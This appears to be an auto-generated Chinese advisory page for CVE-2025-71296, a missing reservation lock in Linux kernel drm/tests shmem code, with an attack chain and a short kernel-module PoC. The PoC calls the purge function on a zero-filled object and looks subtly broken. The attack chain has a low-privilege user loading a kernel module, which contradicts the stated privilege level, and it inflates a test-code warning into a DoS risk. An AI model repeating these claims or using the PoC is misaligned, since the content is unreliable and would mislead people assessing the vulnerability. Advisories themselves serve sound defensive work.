CVE-2025-71296 CVSS 5.5 中危

Linux内核drm/tests shmem锁竞争漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2025-71296

漏洞类型

竞争条件

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核drm/tests模块存在安全漏洞。该漏洞源于测试代码在调用GEM对象的purge操作时，未正确获取并持有对象的预留锁。这导致drm_gem_shmem_purge_locked函数调用时触发内核WARNING警告。本地低权限攻击者利用此问题可能导致系统不稳定或发生拒绝服务攻击，从而影响可用性。

技术细节

该漏洞位于Linux内核的DRM（Direct Rendering Manager）子系统中，具体涉及SHMEM GEM对象的测试代码逻辑。漏洞产生的根本原因是测试代码在调用`drm_gem_shmem_purge_locked()`函数执行清除操作时，未按照规范先获取对象的预留锁（reservation lock）。这种不正确的并发控制机制导致了严重的竞争条件，进而触发了内核层面的WARNING警告。攻击者需要拥有本地低权限账户，通过特制的程序或测试用例触发该代码路径，利用锁机制的不完善可能导致内核崩溃或系统死锁，从而造成拒绝服务风险，严重影响系统可用性。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的低权限用户访问。

STEP 2

步骤2

攻击者加载特制的内核模块或执行触发drm/tests相关路径的代码。

STEP 3

步骤3

系统调用drm_gem_shmem_purge_locked时因未持有预留锁触发竞争条件。

STEP 4

步骤4

内核产生WARNING警告，可能导致系统崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// SPDX-License-Identifier: GPL-2.0
// PoC for CVE-2025-71296: Triggering purge without reservation lock
#include <linux/module.h>
#include <drm/drm_gem_shmem_helper.h>

static int __init poc_init(void)
{
    struct drm_gem_shmem_object *shmem;
    
    // Simplified reproduction logic
    shmem = kzalloc(sizeof(*shmem), GFP_KERNEL);
    if (!shmem)
        return -ENOMEM;

    // Vulnerability: Calling purge without holding reservation lock
    // This triggers the WARNING mentioned in the CVE
    drm_gem_shmem_purge_locked(shmem); 

    kfree(shmem);
    return 0;
}

static void __exit poc_exit(void) {}

module_init(poc_init);
module_exit(poc_exit);
MODULE_LICENSE("GPL");

影响范围

Linux Kernel (Specific versions before commit 3f41307d589c2f25d556d47b165df808124cd0c4)

防御指南

临时缓解措施

建议立即应用官方发布的补丁或更新至最新的稳定版内核，以修复预留锁缺失导致的竞争条件问题。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表